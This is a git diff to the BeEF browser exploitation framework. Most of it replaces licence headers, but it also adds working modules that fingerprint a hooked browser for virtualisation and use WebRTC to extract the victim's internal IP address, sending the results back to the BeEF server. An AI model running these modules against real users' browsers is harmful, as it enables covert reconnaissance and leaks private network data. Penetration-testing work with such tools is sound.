index 5abaac7a5..4a14e28ed 100644
--- a/modules/host/detect_software/command.js
+++ b/modules/host/detect_software/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
           var files = [
diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml
index 4a0ff900c..90ff29f0d 100644
--- a/modules/host/detect_software/config.yaml
+++ b/modules/host/detect_software/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb
index df587f431..e1a0a2e9a 100644
--- a/modules/host/detect_software/module.rb
+++ b/modules/host/detect_software/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_software < BeEF::Core::Command
   
diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js
new file mode 100644
index 000000000..04b2d7b34
--- /dev/null
+++ b/modules/host/detect_vm/command.js
@@ -0,0 +1,64 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by Jeremiah Grossman
+// Ported to BeEF by bcoles
+// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html
+
+beef.execute(function() {
+
+	var result;
+	var dimensions = {
+	'320, 200'   : '',
+	'320, 240'   : '',
+	'320, 480'   : '', // iPhone 4S and earlier
+	'480, 320'   : '', // iPhone 4S and earlier
+	'640, 480'   : '',
+	'640, 1136'  : '', // iPhone 5
+	'800, 480'   : '',
+	'768, 576'   : '',
+	'854, 480'   : '',
+	'1024, 600'  : '',
+	'1136, 640'  : '', // iPhone 5
+	'1152, 768'  : '',
+	'800, 600'   : '',
+	'1024, 768'  : '',
+	'1280, 854'  : '',
+	'1280, 960'  : '',
+	'1280, 1024' : '',
+	'1280, 720'  : '',
+	'1280, 768'  : '',
+	'1366, 768'  : '',
+	'1280, 800'  : '',
+	'1440, 900'  : '',
+	'1440, 960'  : '',
+	'1400, 1050' : '',
+	'1600, 1200' : '',
+	'2048, 1536' : '',
+	'1680, 1050' : '',
+	'1920, 1080' : '',
+	'2048, 1080' : '',
+	'1920, 1200' : '',
+	'2560, 1600' : '',
+	'2560, 2048' : ''
+	};
+
+	var wh = screen.width + ", " + screen.height;
+
+	if (dimensions[wh] != undefined) {
+		result = "Not virtualized";
+	} else if (beef.hardware.isVirtualMachine()) {
+		result = "Virtualized";
+	} else if (beef.hardware.isMobilePhone()) {
+		result = "Not virtualized";
+	} else {
+		result = "This host is virtualized or uses an unrecognized screen resolution";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result+"&w="+screen.width+"&h="+screen.height);
+
+});
+
diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml
new file mode 100644
index 000000000..3ed890562
--- /dev/null
+++ b/modules/host/detect_vm/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_virtualization:
+            enable: true
+            category: "Host"
+            name: "Detect Virtual Machine"
+            description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.

Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results."
+            authors: ["Jeremiah Grossman", "bcoles"]
+            target:
+                 working: ["All"]
diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb
new file mode 100644
index 000000000..590de2f66
--- /dev/null
+++ b/modules/host/detect_vm/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_virtualization < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		save content
+	end
+
+end
diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
index 9d207c1d1..b6b9361f4 100755
--- a/modules/host/get_internal_ip/command.js
+++ b/modules/host/get_internal_ip/command.js
@@ -1,21 +1,12 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
-    var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
+    var applet_uri = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/';
 	var internal_counter = 0;
 	var timeout = 30;
     var output;
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
index 68a4d63c3..19f6a8175 100755
--- a/modules/host/get_internal_ip/config.yaml
+++ b/modules/host/get_internal_ip/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java
index 2882d1de1..38a0589b5 100755
--- a/modules/host/get_internal_ip/get_internal_ip.java
+++ b/modules/host/get_internal_ip/get_internal_ip.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.applet.Applet;
 import java.applet.AppletContext;
 import java.net.InetAddress;
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
index cb950806a..37c8f9407 100755
--- a/modules/host/get_internal_ip/module.rb
+++ b/modules/host/get_internal_ip/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_internal_ip < BeEF::Core::Command
 
diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
new file mode 100755
index 000000000..e5f663ba9
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+   var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
+
+	if (RTCPeerConnection) (function () {
+
+		var addrs = Object.create(null);
+	    addrs["0.0.0.0"] = false;
+	    
+	    // Establish a connection with ICE / relay servers - in this instance: NONE
+	    var rtc = new RTCPeerConnection({iceServers:[]});
+	    if (window.mozRTCPeerConnection) {      // FF needs a channel/stream to proceed
+	        rtc.createDataChannel('', {reliable:false});
+	    };
+	    
+	    // Upon an ICE candidate being found
+	    // Grep the SDP data for IP address data
+	    rtc.onicecandidate = function (evt) {
+	        if (evt.candidate) grepSDP(evt.candidate.candidate);
+	    };
+
+	    // Create an SDP offer
+	    rtc.createOffer(function (offerDesc) {
+	        grepSDP(offerDesc.sdp);
+	        rtc.setLocalDescription(offerDesc);
+	    }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
+	    
+	    function processIPs(newAddr) {
+	        if (newAddr in addrs) return;
+	        else addrs[newAddr] = true;
+	        var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
+	        beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+	    }
+	    
+	    function grepSDP(sdp) {
+	        var hosts = [];
+	        sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
+	            if (~line.indexOf("a=candidate")) {     // http://tools.ietf.org/html/rfc4566#section-5.13
+	                var parts = line.split(' '),        // http://tools.ietf.org/html/rfc5245#section-15.1
+	                    addr = parts[4],
+	                    type = parts[7];
+	                if (type === 'host') processIPs(addr);
+	            } else if (~line.indexOf("c=")) {       // http://tools.ietf.org/html/rfc4566#section-5.7
+	                var parts = line.split(' '),
+	                    addr = parts[2];
+	                processIPs(addr);
+	            }
+	        });
+	    }
+	})(); else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection");
+	} 
+
+});
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
new file mode 100755
index 000000000..53b964e01
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_internal_ip_webrtc:
+            enable: true
+            category: "Host"
+            name: "Get Internal IP WebRTC"
+            description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from http://net.ipcalf.com/"
+            authors: ["xntrik", "@natevw"]
+            target:
+                 working: ["C", "FF"]
+                 unknown: ["All"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
new file mode 100755
index 000000000..3f501683a
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_internal_ip_webrtc < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end
diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js
index 9fb382db4..4baf94a9d 100755
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -1,20 +1,11 @@
-//
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
     var output;
diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml
index afbb27215..6c993b22a 100755
--- a/modules/host/get_physical_location/config.yaml
+++ b/modules/host/get_physical_location/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 beef:
     module:
         get_physical_location:
diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java
index 0a1fb02ad..3b9cb3178 100755
--- a/modules/host/get_physical_location/getGPSLocation.java
+++ b/modules/host/get_physical_location/getGPSLocation.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.io.*;  
 import java.util.*;
 import java.net.*;
diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb
index 17f4723fb..6b23e165d 100755
--- a/modules/host/get_physical_location/module.rb
+++ b/modules/host/get_physical_location/module.rb
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 require 'rubygems'
 require 'json'
 require 'open-uri'
diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js
index df90099bc..dfe782faa 100644
--- a/modules/host/get_registry_keys/command.js
+++ b/modules/host/get_registry_keys/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var internal_counter = 0;
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml
index fda7b3d7a..bb9a9554d 100644
--- a/modules/host/get_registry_keys/config.yaml
+++ b/modules/host/get_registry_keys/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb
index 07d4e4d17..40fc5a324 100644
--- a/modules/host/get_registry_keys/module.rb
+++ b/modules/host/get_registry_keys/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_registry_keys < BeEF::Core::Command
 
diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
index 9eea6fb32..03fc0ae21 100644
--- a/modules/host/get_system_info/command.js
+++ b/modules/host/get_system_info/command.js
@@ -1,25 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var internal_counter = 0;
 	var timeout = 30;
 	var output;
 
-	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', "http://"+beef.net.host+":"+beef.net.port+"/", null, null);
+	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
 
 	if (beef.browser.isFF()) {
 
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 7902a2381..6a05dd9ec 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java
index e6f0f06f4..f90984200 100644
--- a/modules/host/get_system_info/getSystemInfo.java
+++ b/modules/host/get_system_info/getSystemInfo.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.applet.*;
 import java.awt.*;
 import java.net.*;
@@ -146,7 +152,7 @@ public class getSystemInfo extends Applet {
                 }
         } else {
                 //Trying to insert the Beeffeine applet
-                content = "";
+                content = "";
                 $j('body').append(content);
                 internal_counter = 0;
                 //We have to kick off a loop now, because the user has to accept the running of the applet perhaps
diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb
index 128db8a54..d6057375a 100644
--- a/modules/host/get_system_info/module.rb
+++ b/modules/host/get_system_info/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_system_info < BeEF::Core::Command
   
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js
index 54aec9505..8559a4637 100644
--- a/modules/host/get_wireless_keys/command.js
+++ b/modules/host/get_wireless_keys/command.js
@@ -1,20 +1,11 @@
-//
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
     var output;
diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml
index 6bf1f7159..accab8546 100644
--- a/modules/host/get_wireless_keys/config.yaml
+++ b/modules/host/get_wireless_keys/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 beef:
     module:
         get_wireless_keys:
diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb
index 0a3f75be2..30344837a 100644
--- a/modules/host/get_wireless_keys/module.rb
+++ b/modules/host/get_wireless_keys/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_wireless_keys < BeEF::Core::Command
   
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java
index 8349d64a2..627a7db8c 100644
--- a/modules/host/get_wireless_keys/wirelessZeroConfig.java
+++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.io.*;  
 import java.util.*;
 import java.net.*;
diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js
index 2e565a778..b008bd100 100644
--- a/modules/host/hook_default_browser/command.js
+++ b/modules/host/hook_default_browser/command.js
@@ -1,21 +1,12 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	
-	var pdf_url =  'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
+	var pdf_url =  beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
 	window.open( pdf_url, '_blank');
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 56c276653..e5550c11c 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
